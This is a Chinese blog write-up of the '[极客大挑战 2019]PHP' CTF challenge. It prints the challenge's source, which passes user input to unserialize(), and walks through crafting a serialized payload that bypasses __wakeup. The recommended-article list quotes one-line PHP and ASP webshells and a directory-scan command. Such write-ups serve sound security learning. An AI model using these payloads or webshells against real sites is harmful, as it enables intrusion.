2021-09-26

最新推荐文章于 2022-05-24 21:21:52 发布
最新推荐文章于 2022-05-24 21:21:52 发布
阅读量160 收藏
点赞数
分类专栏: ctf 文章标签: php 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZZZllllllxx/article/details/120490871
版权
这篇博客详细介绍了如何解析一个PHP网站的源码,特别是关注了`unserialize`函数的使用。文章中提到,通过修改序列化字符串来绕过`__wakeup`函数的限制,尝试获取flag。然而,由于private属性的限制,需要使用%00截断来访问。虽然尝试了多种方法,但最终未能成功获取flag。博客还涉及了PHP类的构造函数、析构函数以及错误报告设置等相关知识。
摘要由CSDN通过智能技术生成

[极客大挑战 2019]PHP

打开后提示有备份
测试常用的几个备份的后缀最终发现www.zip可以获得源码
在这里插入图片描述
发现有一个flag.php以为就成功了,结果。。。。
再去看index.php

<!DOCTYPE html>
<head>
  <meta charset="UTF-8">
  <title>I have a cat!</title>
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css">
      <link rel="stylesheet" href="style.css">
</head>
<style>
    #login{   
        position: absolute;   
        top: 50%;   
        left:50%;   
        margin: -150px 0 0 -150px;   
        width: 300px;   
        height: 300px;   
    }   
    h4{   
        font-size: 2em;   
        margin: 0.67em 0;   
    }
</style>
<body>


<div id="world">
    <div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 85%;left: 440px;font-family:KaiTi;">因为每次猫猫都在我键盘上乱跳,所以我有一个良好的备份网站的习惯
    </div>
    <div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 80%;left: 700px;font-family:KaiTi;">不愧是我!!!
    </div>
    <div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 70%;left: 640px;font-family:KaiTi;">
    <?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
    ?>
    </div>
    <div style="position: absolute;bottom: 5%;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4y</p></div>
</div>
<script src='http://cdnjs.cloudflare.com/ajax/libs/three.js/r70/three.min.js'></script>
<script src='http://cdnjs.cloudflare.com/ajax/libs/gsap/1.16.1/TweenMax.min.js'></script>
<script src='https://s3-us-west-2.amazonaws.com/s.cdpn.io/264161/OrbitControls.js'></script>
<script src='https://s3-us-west-2.amazonaws.com/s.cdpn.io/264161/Cat.js'></script>
<script  src="index.js"></script>
</body>
</html>

发现几句重要的

>   include 'class.php';
>     $select = $_GET['select'];
>     $res=unserialize(@$select);
>

这里用到的函数有:
unserialize():
unserialize() 函数用于将通过 serialize() 函数序列化后的对象或数组进行反序列化,并返回原始的对象结构
那这几行代码的大体意思就可以知道了
包含class.php,并且以get方式获取select参数,将select参数的值进行反序列化传给res

class.php

<?php
include 'flag.php';     //包含flag.php


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

我们想要输出flag,它有个判断条件,是username绝对等于admin
再往上看,发现password要弱等于100
但是wakeup函数里会把我们的username赋值为guest。
因为__wakeup函数是在__destruct函数之前运行的,所以我们要绕过它。
要绕过__wakeup只要让说明的参数个数大于实际的参数个数就行了。

首先在线运行一下,生成序列化后的字符串

<?php
class Name{
private $username = 'admin';
private $password = '100';#这里也可以换成数字100
}
$name = new Name;
print(serialize($name));
?>

在这里插入图片描述

O:4:“Name”:2:{s:14:“Nameusername”;s:5:“admin”;s:14:“Namepassword”;s:3:“100”;}

也就是把上面的那个2改成3:

O:4:“Name”:3:{s:14:“Nameusername”;s:5:“admin”;s:14:“Namepassword”;s:3:“100”;}

去尝试一下发现并不能成功
这里我们还要了解一些知识点
因为成员(属性)是private,所以要在类名和成员名前加%00这个url编码是空的意思。因为生产序列化时不会把这个空也输出
所以

O:4:“Name”:3:{s:14:"%00Name%00username";s:5:“admin”;s:14:"%00Name%00password";i:100;}

在这里插入图片描述

HaHazzzlll
关注
专栏目录
2021-09-26 WPF上位机 45-关键帧动画
微软MVP Eleven
09-26 3万+
关键帧动画 1、简单线性动画的升级 String TextBlock -》 Text 同步执行 类型+Animation 17种 类型+AnimationUsingKeyFrames 22种 (1)关键帧动画所支持的类型比简单线性动画多 (2)关键帧 可以让定义的动画子项顺序执行 2、关键帧动画结构 简单动画:定义动画类、设置相关属性、触发 关键帧动画:定义动画类、包含关键帧对象 关键帧类型 1、Linear+【类型名称】+KeyFrame 线性变化关键帧,(简单线性动画的处理基本一样) 2、Discre.
PHP序列化与反序列化
lunan的博客
05-15 287
PHP序列化与反序列化 参考文献:浅谈反序列漏洞 1、目录扫描,使用目录扫描工具dirsearch,扫出来一个www.zip的文件,download。 python dirsearch.py -u http://fd524dc7-eca6-4d21-b9c6-f168d37e3951.node3.buuoj.cn/ -e * -w db/dir.txt 2、查看flag.php,发现是个假的flag,因此查看index.php,查看其中的php代码,发现是文件包含的时候,进行了反序列化的过程,传入一个se
buuctf [极客大挑战 2019]PHP
qq_1873822的博客
03-13 720
打开是一个充满色彩的猫猫页面 因为每次猫猫都在我键盘上乱跳,所以我有一个良好的备份网站的习惯不愧是我!!! 应该网站有备份,/www.zip 解题: <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$pas
discuzx源码分析—-class_core.php 核心类
dabao1989的专栏
11-22 904
转自:http://www.oicto.com/discuzx-class_core-php/ 作者:赵荣涛 先看forum.php文件 define(‘APPTYPEID’, 2);//应用类型 define(‘CURSCRIPT’, ‘forum’);//当前脚本 require ‘./source/class/class_core.php’;//加载核心 require
cl.ez6.xyz index.php,[BJDCTF2020]EzPHP-POP链
weixin_39661405的博客
03-10 8160
那次某信内部比赛中有道pop链问题的题目,我当时没有做出来,所以在此总结一下,本次以buu上复现的[MRCTF2020]Ezpop为例。题目1 Welcome to index.php2
buuctf php
ANYOUZHEN的博客
05-24 311
根据提示,网站一个有备份,我们打开御剑,直接扫它,发现了/www.zip,打开 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ $this->userna..
2021-09-26 四位二进制计数器
He_wowo的博客
09-26 689
2021-09-18】网易秋招笔试四道编程题
试问道几许
09-19 1553
通知:最新的秋招笔试编程题题目、思路以及参考代码已经全部整理好放在【TechGuide】了,私信公众号回复【网易】或者【百度】即可获得最实时的笔试题解啦! 通知:最新的秋招笔试编程题题目、思路以及参考代码已经全部整理好放在【TechGuide】了,私信公众号回复【网易】或者【百度】即可获得最实时的笔试题解啦! 通知:最新的秋招笔试编程题题目、思路以及参考代码已经全部整理好放在【TechGuide】了,私信公众号回复【网易】或者【百度】即可获得最实时的笔试题解啦! 通知:最新的秋招笔试编程题题目.
2021-01-18
weixin_54641072的博客
01-18 1850
找程序猿哥哥!!!!编制App或者小程序
中小学数学学习相关书籍-2021-09-26(H)-123页.pdf
09-26
【中小学数学学习相关书籍】是针对不同阶段学生数学学习需求而设计的一系列教育资源。这些书籍旨在帮助孩子从小培养数学兴趣,提升数学能力,为他们在学习生涯中打下坚实的数学基础。 在幼儿数学启蒙阶段,例如《我...
中国智能驾驶行业洞察2021[2021-09-07](26页).pdf
05-26
这份26页的报告涵盖了多个关键知识点,以下是其中的要点概括: 1. **智能驾驶市场发展**:报告指出,截至2021年8月,中国的智能驾驶行业已取得了显著进展,超过99.9%的用户通过应用程序(APP)进行交互,这显示出...
2021-10-17
ZZZllllllxx的博客
10-17 1330
陇剑杯wp 记得住的一些题目 1. 打开之后发现基本都是404 寻找200的发现www.zip 2. 这题当时先注意到题目为jwt,去网上搜索发现他就是一种认证方式,所以答案就是jwt 插一段知识点 Token的定义:Token是服务端生成的一串字符串,以作客户端进行请求的一个令牌,当第一次登录后,服务器生成一个Token便将此Token返回给客户端,以后客户端只需带上这个Token前来请求数据即可,无需再次带上用户名和密码。 使用Token的目的:Token的目的是为了减轻服务器的压力,减少频繁的查询
2021-09-15
ZZZllllllxx的博客
09-22 1233
[RoarCTF 2019]Easy Calc 1 打开之后先看了眼源码 发现一句注释 还有calc.php 去查了一下WAF 英文:Web Application Firewall,简称: WAF 通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品 与传统防火墙不同,WAF工作在应用层 WAF对来自Web应用程序客户端的各类请求进行内容检测和验证,确保其安全性与合法性,对非法的请求予以实时阻断,从而对各类网站站点进行有效防护。 然后访问calc.php发现了源码 &lt
2021-06-15
ZZZllllllxx的博客
06-19 1014
2021/6/15 bugku web30 <?php extract($_GET); if (!empty($ac)) { $f = trim(file_get_contents($fn)); if ($ac === $f) { echo "<p>This is flag:" ." $flag</p>"; } else { echo "<p>sorry!</p>"; } } ?> 这题也有关php伪协议看到了file_get_contents这
2021-09-14
ZZZllllllxx的博客
09-15 573
[极客大挑战 2019]Upload 常见upload检查内容有,后缀名、content-type、文件头的部分内容 经常用到的一句话木马有 php: <?php @eval($_POST['21']);?> asp: <%eval request (“21”)%> aspx: <%@ Page Language=“Jscript”%> <%eval(Request.Item[“21”],“unsafe”);%> 试图直接上传php一句话木马,但是并未
2021-06-06
ZZZllllllxx的博客
06-06 291
bugku 2021/6/6 web26 解题 用hackbar的referrer直接加http://www.google.com/ HTTP 请求报文由3部分组成(请求行+请求头+请求体) 请求行=请求方法+请求URL+HTTP协议及版本 请求方法:GET和POST是最常见的HTTP方法,除此以外还包括 DELETE、HEAD、OPTIONS、PUT、TRACE 请求URL地址:他和报文头的Host属性,组合起来是一个完整的请求URL 本题考查的主要为请求报文头的属性 常见的HTTP 报文头属性 Accp
【无标题】
ZZZllllllxx的博客
04-12 214
[GYCTF2020]Blacklist 1 一开始进行常规sql注入的时候可以发现存在注入点 进行联合注入,发现屏蔽了关键字 做到这里没有思路去看wp发现使用的是堆叠注入 堆叠注入定义:一堆 sql 语句(多条)一起执行 堆叠注入原理:在SQL中,分号(;)是用来表示一条sql语句的结束,我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行? 与联合注入的区别: 联合注入是用关键词 union 将语句进行合并,两个语句必须拥有相同的项,而且功能有限。主要用来查询 堆叠注入则用“;”将不同语句
2021-06-19
ZZZllllllxx的博客
06-19 195
2021/6/17 buu [HCTF 2018]WarmUp 打开后看源码发现source.php找到如下代码,又在注释中找到了hint.php打开提示 先分析找到的代码,发现include()应该是文件包含 <?php highlight_file(__FILE__); class emmm //定义emmm类 { public static function checkFile(&$page) //将传入的参数赋给$page
有一个表A ,有字段date,值是 2023-01-31,2023-02-28,2023-03-06, 还有一个表B,有金额和日期两个字段,值是2023-03-09 00:00:00.000000 47260 2022-12-29 00:00:00.000000 28566 2022-08-01 00:00:00.000000 3378.7 2023-03-29 00:00:00.000000 4296 2023-03-06 00:00:00.000000 2369 2022-12-26 00:00:00.000000 51100 2023-02-07 00:00:00.000000 33057 2021-08-11 00:00:00.000000 11500 2022-04-14 00:00:00.000000 23219.8 2022-02-09 00:00:00.000000 100010 2021-12-31 00:00:00.000000 59100 写一个oracle sql 计算B表的日期分别在表A中的每个日期的前一年到该日期时间的B表的金额的总和
最新发布
06-07
可以使用Oracle的日期函数和子查询来解决这个问题。以下是一个可能的SQL语句: ``` SELECT A.date, SUM(B.amount) AS total_amount FROM A, B WHERE B.date BETWEEN ADD_MONTHS(A.date, -12) AND A.date ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值